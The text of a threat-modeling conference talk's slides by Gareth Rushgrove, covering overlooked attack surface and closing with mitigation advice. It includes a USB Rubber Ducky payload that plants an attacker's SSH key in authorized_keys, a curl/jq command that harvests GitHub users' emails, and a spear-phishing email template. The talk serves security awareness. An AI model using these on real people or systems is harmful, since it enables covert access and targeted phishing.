15. Ignoring part of your system
when considering security is
a common mistake
Gareth Rushgrove
16. Gareth Rushgrove
the attack surface of a software environment
is the sum of the different points (the "attack
vectors") where an unauthorized user (the
"attacker") can try to enter data to or extract
data from an environment.
ATTACK SURFACE
24. Gareth Rushgrove
an entity which facilitates interactions
between two parties who both trust
the third party
TRUSTED THIRD PARTY
25. Gareth Rushgrove
a term in computer science and security used
to describe a boundary where program data or
execution changes its level of "trust". The
term refers to any distinct boundary within
which a system trusts all sub-systems
(including data).
TRUST BOUNDARY
51. Let’s assume your applications and
infrastructure are super secure*
Gareth Rushgrove
* This probably isn’t true. You should worry about that as well.
63. Gareth Rushgrove
More Internet
Some Internet
Marks iPhone
FREE CONFERENCE WIFI
Hacked Android
CONFERENCE VENUE
Private
Software Circus
Company next door
Coffee shop downstairs
Software Circus II
Docker Corp
Avengers Tower
FON
My Blackberry
Nokia4ever
ABANK
64. Gareth Rushgrove
More Internet
Some Internet
Marks iPhone
FREE CONFERENCE WIFI
Hacked Android
CONFERENCE VENUE
Private
Software Circus
Company next door
Coffee shop downstairs
Software Circus II
Docker Corp
Avengers Tower
FON
My Blackberry
Nokia4ever
ABANK
This is the official
conference wifi right?
65. Gareth Rushgrove
More Internet
Some Internet
Marks iPhone
FREE CONFERENCE WIFI
Hacked Android
CONFERENCE VENUE
Private
Software Circus
Company next door
Coffee shop downstairs
Software Circus II
Docker Corp
Avengers Tower
FON
My Blackberry
Nokia4ever
ABANK
Or is it this one?
Whatever, both work
66. Devices exist to man-in-the-middle
wireless networks
Gareth Rushgrove
67. Who has ever picked up a USB
memory stick at a conference?
Gareth Rushgrove
69. USB devices exist which will run a
script on connect (normally by
impersonating a keyboard)
Gareth Rushgrove
70. (without introducing more risk)
DELAY 1000
COMMAND SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 800
STRING echo 'RSA_PUB_ID' >> ~/.ssh/authorized_keys
ENTER
DELAY 1000
STRING killall Terminal
ENTER
Add my public key
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Passwordless-SSH-access-%28ssh-keys%29
72. Lots of people here are on Twitter
and using the conference hashtag
Gareth Rushgrove
73. Lots of people here are on GitHub
with the same username
Gareth Rushgrove
74. (without introducing more risk)
$ curl -s https://api.github.com/users/<username>/events/public
| jq '.[].payload.commits[0].author.email'
| sort
| uniq
| grep -v "null"
Email from GitHub user
75. an e-mail spoofing fraud attempt that targets
a specific organization or individual, seeking
unauthorized access to confidential data.
Gareth Rushgrove
SPEAR PHISHING
76. Hi <your name>
Great to see you at <conference name here> last
week.
I thought you’d be interested in the container testing
tool I mentioned. http://nothingevilhere.com. Would
love to know what you think.
Hopefully see you at DockerCon next year too.
77. (without introducing more risk)
So you’re saying
we’re all doomed?
This is quite depressing now I think about it
78. Part of threat modeling is coming
up with suitable mitigations to the
risks identified
Gareth Rushgrove
79. - 2 factor authentication
- Time-limited credentials
- Separation of duties
- Two person rule
- Configuration management
Gareth Rushgrove
80. having more than one person required to
complete a task. In business the separation by
sharing of more than one individual in one
single task is an internal control intended to
prevent fraud and error.
Gareth Rushgrove
SEPARATION OF DUTIES
81. a control mechanism designed to achieve a
high level of security for especially critical
material or operations. Under this rule all
access and actions requires the presence of
two authorized people at all times.
Gareth Rushgrove
TWO-PERSON RULE
82. Gareth Rushgrove
a process that identifies critical information to
determine if friendly actions can be observed
by enemy intelligence and determines if
information obtained by adversaries could be
interpreted to be useful to them.
OPERATIONAL SECURITY (OPSEC)
83. Once you understand the threat
you can seek out specific guidance
Gareth Rushgrove
84.
85. - Protect data in transit
- Protect data at rest
- Authentication
- Secure boot
- Platform integrity and sandboxing
- Application whitelisting
Gareth Rushgrove
- Malicious code detection
- Security policy enforcement
- External interface protection
- Device update policy
- Event collection and analysis
- Incident response
https://www.cesg.gov.uk/guidance/end-user-devices-security-principles